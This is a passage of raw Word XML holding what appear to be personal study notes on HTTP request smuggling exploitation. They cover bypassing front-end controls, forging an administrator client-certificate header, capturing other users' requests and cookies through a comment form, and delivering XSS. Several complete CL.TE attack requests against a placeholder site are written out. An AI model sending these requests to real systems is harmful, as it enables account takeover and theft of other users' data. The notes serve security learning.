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5B035E" w14:textId="034DBD94" w:rsidR="0005478F" w:rsidRDefault="00792F0C">
      <w:r>
        <w:t xml:space="preserve">EXPLOITATION: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09118514" w14:textId="2A7019E9" w:rsidR="00C45F8D" w:rsidRDefault="00C45F8D">
      <w:r>
        <w:t>*** the smallest thing will cause a payload to fail, before quitting go over your request char by char if we run into issues. If we see signs from the detection phase (timeouts, 404, poisoning etc) there is a vuln there be patient and very careful ***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AE67B2" w14:textId="77777777" w:rsidR="00792F0C" w:rsidRDefault="00792F0C"/>
    <w:p w14:paraId="14924270" w14:textId="6439E5D9" w:rsidR="00792F0C" w:rsidRDefault="00792F0C">
      <w:r>
        <w:t>Most security controls are implemented on the front end. Smuggling requests allows us to essentially bypass these security features and get a request directly to the backend. This can lead to many different exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633D627" w14:textId="079FEC84" w:rsidR="0003015C" w:rsidRPr="003B5198" w:rsidRDefault="0003015C" w:rsidP="00853F12">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B5198">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Accessing Blocked Pages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E46B16" w14:textId="653E64DB" w:rsidR="00792F0C" w:rsidRDefault="0003015C" w:rsidP="00853F12">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This often relies on the following section as well (header manipulation). </w:t>
      </w:r>
      <w:r w:rsidR="00792F0C">
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve">may be able to </w:t>
      </w:r>
      <w:r w:rsidR="00792F0C">
        <w:t>gain access to previously restricted pages</w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve">. This can happen for many reasons. The smuggled request may make it through to the backend thus bypassing </w:t>
      </w:r>
      <w:r>
        <w:t>front-end</w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve"> checks. This could cause the server to serve that response. Alternatively</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve"> we may be able to include headers such as “Host:” or X-Forwarded-For in the smuggled response. This is useful because almost always the front end or even </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve">browser will rewrite these headers automatically. Smuggling them will bypass these normal security features which could lead to easy access </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve"> various blocked pages. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B78364" w14:textId="59E8A744" w:rsidR="0003015C" w:rsidRDefault="0003015C" w:rsidP="00853F12">
      <w:r w:rsidRPr="003B5198">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manipulating / Seeing custom or blocked Headers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E698A" w14:textId="4249875D" w:rsidR="0011494B" w:rsidRDefault="0011494B" w:rsidP="00853F12">
      <w:r>
        <w:t xml:space="preserve">We may be able to see </w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve">custom (non-standard) headers in </w:t>
      </w:r>
      <w:r w:rsidR="0003015C">
        <w:t>the server's response</w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve"> sometimes in the body. This is done if we find a reflected value in the page and smuggle a request containing that parameter in the body of the request. This will cause the request following this to be appended to the parameter and result in that </w:t>
      </w:r>
      <w:r w:rsidR="0003015C">
        <w:t>request's</w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve"> response being reflected in the response we see. The bold in the below example is what we </w:t>
      </w:r>
      <w:r w:rsidR="0003015C">
        <w:t>sent</w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidR="0003015C">
        <w:t>non-bold</w:t>
      </w:r>
      <w:r w:rsidR="00853F12">
        <w:t xml:space="preserve"> is the following request that would be appended to our smuggled one. Ex: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FBF123" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5E9DC3" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD717B6" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Length: 130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B55ABC" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066D249" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639E1B40" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43885332" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEC830C" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST /login HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6C540E" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E157C1" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F06991" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Length: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760ED370" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226353C0" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:r w:rsidRPr="00853F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>email=</w:t>
      </w:r>
      <w:r w:rsidRPr="00853F12">
        <w:t>POST /login HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5790BA4D" w14:textId="77777777" w:rsidR="00853F12" w:rsidRPr="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:r w:rsidRPr="00853F12">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024C4E15" w14:textId="6647F5BC" w:rsidR="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12">
      <w:r w:rsidRPr="00853F12">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE97E28" w14:textId="77777777" w:rsidR="00853F12" w:rsidRDefault="00853F12" w:rsidP="00853F12"/>
    <w:p w14:paraId="0B216DEC" w14:textId="78BB03FA" w:rsidR="00853F12" w:rsidRDefault="00BA7D16" w:rsidP="00853F12">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Another very common hidden header is </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7D16">
        <w:t>X-SSL-CLIENT-CN</w:t>
      </w:r>
      <w:r>
        <w:t>. This is used by servers that implement mutual certificate exchange. So unknowingly when a user makes a request their browser passes this header in the request along with their username. So we could do something like</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7D16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X-SSL-CLIENT-CN: administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to potentially bypass client authentication. Just another useful trick to test out especially if we see something interesting in terms of hidden headers. </w:t>
      </w:r>
      <w:r w:rsidR="0003015C">
        <w:t>Again,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this is normally always overridden in normal requests but passing it in smuggled requests will bypass this override. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F2F06" w14:textId="0EBC96DE" w:rsidR="00BA7D16" w:rsidRPr="003B5198" w:rsidRDefault="0003015C" w:rsidP="00853F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B5198">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Capturing Other User's Requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C68DED" w14:textId="5B970BC2" w:rsidR="0003015C" w:rsidRDefault="0003015C" w:rsidP="00853F12">
      <w:r>
        <w:t xml:space="preserve">This is reliant on the website having functionality to store and later retrieve textual data. This capture could include cookies or sensitive data. </w:t>
      </w:r>
      <w:r w:rsidRPr="0003015C">
        <w:t>Suitable functions to use as the vehicle for this attack would be comments, emails, profile descriptions, screen names, and so on.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> To perform we must smuggle a request that submits data to the storage function. Ex for a app that allows comments on blog posts which will be displayed on the blog post: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A73C1" w14:textId="63CCAC9A" w:rsidR="00533091" w:rsidRDefault="00533091" w:rsidP="00853F12">
      <w:r>
        <w:t>-------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4221F83D" w14:textId="326BE155" w:rsidR="00533091" w:rsidRDefault="00533091" w:rsidP="00853F12">
      <w:r>
        <w:t xml:space="preserve">Normal Request: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1DDDFA" w14:textId="77777777" w:rsidR="0003015C" w:rsidRPr="0003015C" w:rsidRDefault="0003015C" w:rsidP="0003015C">
      <w:r w:rsidRPr="0003015C">
        <w:t>POST /post/comment HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9862D" w14:textId="77777777" w:rsidR="0003015C" w:rsidRPr="0003015C" w:rsidRDefault="0003015C" w:rsidP="0003015C">
      <w:r w:rsidRPr="0003015C">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD5BB2" w14:textId="77777777" w:rsidR="0003015C" w:rsidRPr="0003015C" w:rsidRDefault="0003015C" w:rsidP="0003015C">
      <w:r w:rsidRPr="0003015C">
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B36BFD" w14:textId="77777777" w:rsidR="0003015C" w:rsidRPr="0003015C" w:rsidRDefault="0003015C" w:rsidP="0003015C">
      <w:r w:rsidRPr="0003015C">
        <w:t>Content-Length: 154</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7342CF2E" w14:textId="77777777" w:rsidR="0003015C" w:rsidRPr="0003015C" w:rsidRDefault="0003015C" w:rsidP="0003015C">
      <w:r w:rsidRPr="0003015C">
        <w:t>Cookie: session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651304BB" w14:textId="77777777" w:rsidR="0003015C" w:rsidRPr="0003015C" w:rsidRDefault="0003015C" w:rsidP="0003015C"/>
    <w:p w14:paraId="5160CB88" w14:textId="25A95EDD" w:rsidR="0003015C" w:rsidRPr="00533091" w:rsidRDefault="0003015C" w:rsidP="0003015C">
      <w:r w:rsidRPr="00533091">
        <w:t>csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&amp;postId=2&amp;comment=My+comment&amp;name=Carlos+Montoya&amp;email=carlos%40normal-user.net&amp;website=https%3A%2F%2Fnormal-user.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567CAED6" w14:textId="5C9D994A" w:rsidR="0003015C" w:rsidRDefault="00533091" w:rsidP="0003015C">
      <w:r>
        <w:t xml:space="preserve">------------------------- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD2699" w14:textId="5C5C5D32" w:rsidR="00533091" w:rsidRDefault="00533091" w:rsidP="0003015C">
      <w:r>
        <w:t xml:space="preserve">Now what would happen if we submit an overly long content-length header and positon the comment param at the end of the request like so: </w:t>
      </w:r>
      <w:r w:rsidR="00773A67">
        <w:t xml:space="preserve">** note we include OUR cookie in the smuggled request as this is often needed to make the post request to the storage function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B0D60" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748D0A8B" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DA5B33" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9922A" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Length: 330</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B99188B" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4F6AAE" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC7B7D" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DA4201" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST /post/comment HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0522E0CE" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2616FA68" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A912AC4" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Length: 400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2289E2" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie: session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E104D0F" w14:textId="77777777" w:rsidR="00533091" w:rsidRPr="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1993F4E2" w14:textId="32692DDD" w:rsidR="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&amp;postId=2&amp;name=Carlos+Montoya&amp;email=carlos%40normal-user.net&amp;website=https%3A%2F%2Fnormal-user.net&amp;comment=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31295C44" w14:textId="7C47DE49" w:rsidR="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:r>
        <w:t xml:space="preserve">--------------------- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C8A03C" w14:textId="12AE75E5" w:rsidR="00533091" w:rsidRDefault="00533091" w:rsidP="00533091">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The body is only 144 bytes but the request specifies 400. Thus, the server will wait for the remaining 256 bytes and if it does not come in time the request will time out. If it doesn’t time out, the next 256 bytes of the NEXT request made by any user will be appended and posted as a comment and then can easily be read by us. </w:t>
      </w:r>
      <w:r w:rsidR="006D18E3">
        <w:t xml:space="preserve">Depending on how big the site is it could take a while for the next reuqets to come in. In repeater we will often see a 200 ok and our smuggled request will just chill in the backend until the remained of bytes can be filled or until it is dropped. </w:t>
      </w:r>
      <w:r>
        <w:t>*** limitation: the request will only capture data up to the parameter delimited applicable for the current request. In the above example a &amp; char would effectively terminate the capture and wed only see data up until that character. This could even appear in the query string ;(. ***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF52C17" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Using Request Smuggling to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reflected XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA95C34" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:r>
        <w:t xml:space="preserve">This form of XSS requires 0 user interaction making it more impactful. The XSS can be found in either params or headers (could be useful to use param miner to check this). To do this we just smuggle a request containing the XSS and the next user's request will then receive the XSS payload in their response. We can test this in our own browser or use something like XSS hunter to capture a true XSS in another user's browser. EX for CL.TE config with XSS in user agent header: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6242F574" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCF56AE" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563D2E7F" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Length: 63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D9D73" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FDFA0D" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6EA42E" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D6248" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D061D0" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22453391" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-Agent: &lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D814B2" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
